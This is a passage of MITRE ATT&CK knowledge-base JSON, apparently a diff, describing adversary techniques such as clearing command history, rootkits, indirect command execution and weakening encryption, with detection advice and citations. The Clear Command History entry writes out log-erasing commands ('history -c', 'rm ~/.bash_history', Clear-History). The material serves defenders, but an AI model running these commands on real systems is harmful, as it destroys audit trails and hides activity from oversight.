"x_mitre_detection": "Once adversaries have provisioned software on a compromised VPS (ex: for use as a command and control server), internet scans may reveal VPSs that adversaries have compromised. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--39cc9f64-cf74-4a48-a4d8-fe98c54a02e0", + "created": "2020-10-01T00:55:17.771Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1584/003", + "external_id": "T1584.003" + }, + { + "source_name": "NSA NCSC Turla OilRig", + "description": "NSA/NCSC. (2019, October 21). Cybersecurity Advisory: Turla Group Exploits Iranian APT To Expand Coverage Of Victims. Retrieved October 16, 2020.", + "url": "https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%20-%20nsa.gov.pdf" + }, + { + "source_name": "ThreatConnect Infrastructure Dec 2020", + "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.", + "url": "https://threatconnect.com/blog/infrastructure-research-hunting/" + }, + { + "source_name": "Mandiant SCANdalous Jul 2020", + "description": "Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021.", + "url": "https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation" + }, + { + "source_name": "Koczwara Beacon Hunting Sep 2021", + "description": "Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.", + "url": "https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-28T15:58:48.119Z", + "name": "AutoHotKey & AutoIT", + "description": "Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)\n\nAdversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk DarkGate)\n\nThese scripts may also be compiled into self-contained executable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "TruKno", + "Liran Ravich, CardinalOps", + "Serhii Melnyk, Trustwave SpiderLabs", + "Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International", + "@_montysecurity" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_remote_support": false, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--3a32740a-11b0-4bcf-b0a9-3abd0f6d3cd5", + "created": "2024-03-29T18:07:04.743Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1059/010", + "external_id": "T1059.010" + }, + { + "source_name": "AutoHotKey", + "description": "AutoHotkey Foundation LLC. (n.d.). Using the Program. Retrieved March 29, 2024.", + "url": "https://www.autohotkey.com/docs/v1/Program.htm" + }, + { + "source_name": "AutoIT", + "description": "AutoIT. (n.d.). Running Scripts. Retrieved March 29, 2024.", + "url": "https://www.autoitscript.com/autoit3/docs/intro/running.htm" + }, + { + "source_name": "Splunk DarkGate", + "description": "Splunk Threat Research Team. (2024, January 17). Enter The Gates: An Analysis of the DarkGate AutoIt Loader. Retrieved March 29, 2024.", + "url": "https://www.splunk.com/en_us/blog/security/enter-the-gates-an-analysis-of-the-darkgate-autoit-loader.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Reduce Key Space", + "description": "Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)\n\nAdversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key.\n\nAdversaries may modify the key size used and other encryption parameters using specialized commands in a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) introduced to the system through [Modify System Image](https://attack.mitre.org/techniques/T1601) to change the configuration of the device. (Citation: Cisco Blog Legacy Device Attacks)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "There is no documented method for defenders to directly identify behaviors that reduce encryption key space. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601) and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). Some detection methods require vendor support to aid in investigation.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--3a40f208-a9c1-4efa-a598-4003c3681fb8", + "created": "2020-10-19T19:03:48.310Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1600/001", + "external_id": "T1600.001" + }, + { + "source_name": "Cisco Synful Knock Evolution", + "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.", + "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices" + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-02-14T20:07:44.756Z", + "name": "Clear Command History", + "description": "In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.\n\nOn Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions.\n\nAdversaries may delete their commands from these logs by manually clearing the history (history -c) or deleting the bash history file rm ~/.bash_history. \n\nAdversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to clear command history data (clear logging and/or clear history).(Citation: US-CERT-TA18-106A)\n\nOn Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the PSReadLine module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.\n\nThe PSReadLine command history tracks the commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)\n\nAdversaries may run the PowerShell command Clear-History to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the ConsoleHost_history.txt file. Adversaries may also delete the ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Vikas Singh, Sophos", + "Emile Kenning, Sophos", + "Austin Clark, @c2defense" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "User authentication, especially via remote terminal services like SSH, without new entries in that user's ~/.bash_history is suspicious. Additionally, the removal/clearing of the ~/.bash_history file can be an indicator of suspicious activity.\n\nMonitor for suspicious modifications or deletion of ConsoleHost_history.txt and use of the Clear-History command.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "1.5", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Host forensic analysis", + "Log analysis" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a", + "created": "2020-01-31T12:32:08.228Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1070/003", + "external_id": "T1070.003" + }, + { + "source_name": "Sophos PowerShell command audit", + "description": "jak. (2020, June 27). Live Discover - PowerShell command audit. Retrieved August 21, 2020.", + "url": "https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit" + }, + { + "source_name": "Microsoft PowerShell Command History", + "description": "Microsoft. (2020, May 13). About History. Retrieved September 4, 2020.", + "url": "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7" + }, + { + "source_name": "US-CERT-TA18-106A", + "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A" + }, + { + "source_name": "Sophos PowerShell Command History Forensics", + "description": "Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved September 4, 2020.", + "url": "https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-24T14:00:00.188Z", + "name": "Indirect Command Execution", + "description": "Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)\n\nAdversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Matthew Demaske, Adaptforward" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor and analyze logs from host-based detection mechanisms, such as Sysmon, for events such as process creations that include or are resulting from parameters associated with invoking programs/commands/files and/or spawning child processes/network connections. (Citation: RSA Forfiles Aug 2017)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Static File Analysis", + "Application Control" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1202", + "external_id": "T1202" + }, + { + "source_name": "Evi1cg Forfiles Nov 2017", + "description": "Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved January 22, 2018.", + "url": "https://twitter.com/Evi1cg/status/935027922397573120" + }, + { + "source_name": "RSA Forfiles Aug 2017", + "description": "Partington, E. (2017, August 14). Are you looking out for forfiles.exe (if you are watching for cmd.exe). Retrieved January 22, 2018.", + "url": "https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe" + }, + { + "source_name": "VectorSec ForFiles Aug 2017", + "description": "vector_sec. (2017, August 11). Defenders watching launches of cmd? What about forfiles?. Retrieved January 22, 2018.", + "url": "https://twitter.com/vector_sec/status/896049052642533376" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Custom Cryptographic Protocol", + "description": "Adversaries may use a custom cryptographic protocol or algorithm to hide command and control traffic. A simple scheme, such as XOR-ing the plaintext with a fixed key, will produce a very weak ciphertext.\n\nCustom encryption schemes may vary in sophistication. Analysis and reverse engineering of malware samples may be enough to discover the algorithm and encryption key used.\n\nSome adversaries may also attempt to implement their own version of a well-known cryptographic algorithm instead of using a known implementation library, which may lead to unintentional errors. (Citation: F-Secure Cosmicduke)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "If malware uses custom encryption with symmetric keys, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures. (Citation: Fidelis DarkComet)\n\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect when communications do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", + "created": "2017-05-31T21:30:31.197Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1024", + "external_id": "T1024" + }, + { + "source_name": "F-Secure Cosmicduke", + "description": "F-Secure Labs. (2014, July). COSMICDUKE Cosmu with a twist of MiniDuke. Retrieved July 3, 2014.", + "url": "https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf" + }, + { + "source_name": "Fidelis DarkComet", + "description": "Fidelis Cybersecurity. (2015, August 4). Looking at the Sky for a DarkComet. Retrieved April 5, 2016.", + "url": "https://www.fidelissecurity.com/sites/default/files/FTA_1018_looking_at_the_sky_for_a_dark_comet.pdf" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Revert Cloud Instance", + "description": "An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.\n\nAnother variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Netskope" + ], + "x_mitre_detection": "Establish centralized logging of instance activity, which can be used to monitor and review system events even after reverting to a snapshot, rolling back changes, or changing persistence/type of storage. Monitor specifically for events related to snapshots and rollbacks and VM configuration changes, that are occurring outside of normal activity. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--3b4121aa-fc8b-40c8-ac4f-afcb5838b72c", + "created": "2019-09-04T14:37:07.959Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1536", + "external_id": "T1536" + }, + { + "source_name": "Tech Republic - Restore AWS Snapshots", + "description": "Hardiman, N.. (2012, March 20). Backing up and restoring snapshots on Amazon EC2 machines. Retrieved October 8, 2019.", + "url": "https://www.techrepublic.com/blog/the-enterprise-cloud/backing-up-and-restoring-snapshots-on-amazon-ec2-machines/" + }, + { + "source_name": "Google - Restore Cloud Snapshot", + "description": "Google. (2019, October 7). Restoring and deleting persistent disk snapshots. Retrieved October 8, 2019.", + "url": "https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:03.989Z", + "name": "Rootkit", + "description": "Adversaries may deploy rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting and modifying operating-system API calls that supply system information. Rootkits or rootkit-enabling functionality may reside at the user or kernel level in the operating system, or lower. (Citation: Enterprise ATT&CK January 2018) \n\nFirmware rootkits that affect the operating system yield nearly full control of the system. While firmware rootkits are normally developed for the main processing board, they can also be developed for the I/O that is attached to an asset. Compromise of this firmware allows the modification of all of the process variables and functions the module engages in. This may result in commands being disregarded and false information being fed to the main device. By tampering with device processes, an adversary may inhibit its expected response functions and possibly enable [Impact](https://attack.mitre.org/tactics/TA0105).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "evasion" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Firmware: Firmware Modification" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0851", + "external_id": "T0851" + }, + { + "source_name": "Enterprise ATT&CK January 2018", + "description": "Enterprise ATT&CK 2018, January 11 Rootkit Retrieved. 2018/05/16 ", + "url": "https://attack.mitre.org/wiki/Technique/T1014" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-17T20:42:21.453Z", + "name": "Replication Through Removable Media", + "description": "Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.\n\nMobile devices may also be used to infect PCs with malware if connected via USB.(Citation: Exploiting Smartphone USB ) This infection may be achieved using devices (Android, iOS, etc.) and, in some instances, USB charging cables.(Citation: Windows Malware Infecting Android)(Citation: iPhone Charging Cable Hack) For example, when a smartphone is connected to a system, it may appear to be mounted similar to a USB-connected disk drive. If malware that is compatible with the connected system is on the mobile device, the malware could infect the machine (especially if Autorun features are enabled).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Joas Antonio dos Santos, @C0d3Cr4zy" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor file access on removable media. Detect processes that execute from removable media after it is mounted or when initiated by a user. If a remote access tool is used in this manner to move laterally, then additional actions are likely to occur after execution, such as opening network connections for Command and Control and system and network information Discovery.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_system_requirements": [ + "Removable media allowed, Autorun enabled or vulnerability present that allows for code execution" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4", + "created": "2017-05-31T21:31:08.977Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1091", + "external_id": "T1091" + }, + { + "source_name": "Windows Malware Infecting Android", + "description": "Lucian Constantin. (2014, January 23). Windows malware tries to infect Android devices connected to PCs. Retrieved May 25, 2022.", + "url": "https://www.computerworld.com/article/2486903/windows-malware-tries-to-infect-android-devices-connected-to-pcs.html" + }, + { + "source_name": "iPhone Charging Cable Hack", + "description": "Zack Whittaker. (2019, August 12). This hacker’s iPhone charging cable can hijack your computer. Retrieved May 25, 2022.", + "url": "https://techcrunch.com/2019/08/12/iphone-charging-cable-hack-computer-def-con/" + }, + { + "source_name": "Exploiting Smartphone USB ", + "description": "Zhaohui Wang & Angelos Stavrou. (n.d.). Exploiting Smart-Phone USB Connectivity For Fun And Profit. Retrieved May 25, 2022.", + "url": "https://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.226.3427&rep=rep1&type=pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Data from Local System", + "description": "Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.\n\nAdversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "William Cain", + "Austin Clark, @c2defense" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor processes and command-line arguments for actions that could be taken to collect files from a system. Remote access tools with built-in features may interact directly with the Windows API to gather data. Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to collect files such as configuration files with built-in features native to the network device platform.(Citation: Mandiant APT41 Global Intrusion )(Citation: US-CERT-TA18-106A) Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nFor network infrastructure devices, collect AAA logging to monitor `show` commands that view configuration files. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "1.6", + "x_mitre_data_sources": [], + "x_mitre_system_requirements": [ + "Privileges to access certain files and directories" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "created": "2017-05-31T21:30:20.537Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1005", + "external_id": "T1005" + }, + { + "source_name": "show_run_config_cmd_cisco", + "description": "Cisco. (2022, August 16). show running-config - Cisco IOS Configuration Fundamentals Command Reference . Retrieved July 13, 2022.", + "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/show_protocols_through_showmon.html#wp2760878733" + }, + { + "source_name": "Mandiant APT41 Global Intrusion ", + "description": "Gyler, C.,Perez D.,Jones, S.,Miller, S.. (2021, February 25). This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved February 17, 2022.", + "url": "https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits" + }, + { + "source_name": "US-CERT-TA18-106A", + "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-08-14T19:28:18.334Z", + "name": "Deobfuscate/Decode Files or Information", + "description": "Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.\n\nOne such example is the use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file.(Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows copy /b command to reassemble binary fragments into a malicious payload.(Citation: Carbon Black Obfuscation Sept 2016)\n\nSometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Matthew Demaske, Adaptforward", + "Red Canary" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detecting the action of deobfuscating or decoding files or information may be difficult depending on the implementation. If the functionality is contained within malware and uses the Windows API, then attempting to detect malicious behavior before or after the action may yield better results than attempting to perform analysis on loaded libraries or API calls. If scripts are used, then collecting the scripts for analysis may be necessary. Perform process and command-line monitoring to detect potentially malicious behavior related to scripts and system utilities such as 